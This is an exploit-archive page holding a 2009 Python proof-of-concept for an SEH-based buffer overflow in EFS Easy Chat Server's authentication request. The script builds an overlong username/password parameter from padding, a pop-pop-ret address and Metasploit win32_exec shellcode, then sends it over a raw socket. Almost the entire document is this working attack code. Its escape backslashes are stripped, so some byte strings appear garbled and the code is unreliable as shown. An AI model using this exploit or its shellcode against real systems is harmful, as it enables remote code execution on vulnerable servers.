EFS Easy Chat Server Authentication Request BOF Exploit (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : EFS Easy Chat Server Authentication Request BOF Exploit (SEH)
# Published : 2009-03-03
# Author : His0k4
# Previous Title : Easy File Sharing Web Server 4.8 File Disclosure Vulnerability
# Next Title : Sopcast SopCore Control (sopocx.ocx) Command Execution Exploit

#!/usr/bin/python
#[*] Bug : 	    EFS Easy Chat Server Authentication Request  Buffer Overflow Exploit (SEH)
#[*] Refer :        http://www.milw0rm.com/exploits/4289
#[*] Tested on :    Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings :    All friends & muslims HaCkErs (DZ)

import struct
import socket



buf = "x41"*216
buf += "xEBx06xAExFA" #jmp+6
buf += "xB6xB2x01x10" #universal pop pop ret
buf += "x90"*19

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
buf+=(
	"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xa4"
	"x0dx2bxbax83xebxfcxe2xf4x58xe5x6fxbaxa4x0dxa0xff"
	"x98x86x57xbfxdcx0cxc4x31xebx15xa0xe5x84x0cxc0xf3"
	"x2fx39xa0xbbx4ax3cxebx23x08x89xebxcexa3xccxe1xb7"
	"xa5xcfxc0x4ex9fx59x0fxbexd1xe8xa0xe5x80x0cxc0xdc"
	"x2fx01x60x31xfbx11x2ax51x2fx11xa0xbbx4fx84x77x9e"
	"xa0xcex1ax7axc0x86x6bx8ax21xcdx53xb6x2fx4dx27x31"
	"xd4x11x86x31xccx05xc0xb3x2fx8dx9bxbaxa4x0dxa0xd2"
	"x98x52x1ax4cxc4x5bxa2x42x27xcdx50xeaxccxfdxa1xbe"
	"xfbx65xb3x44x2ex03x7cx45x43x6ex4axd6xc7x0dx2bxba")

head  = "GET /chat.ghp?username="+buf+"&password="+buf+"&room=1 HTTP/1.1rn"
head += "Host: 127.0.0.1rn"


s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('127.0.0.1',80))
s.send(head + "rnrn")
s.close()

# www.Syue.com [2009-03-03]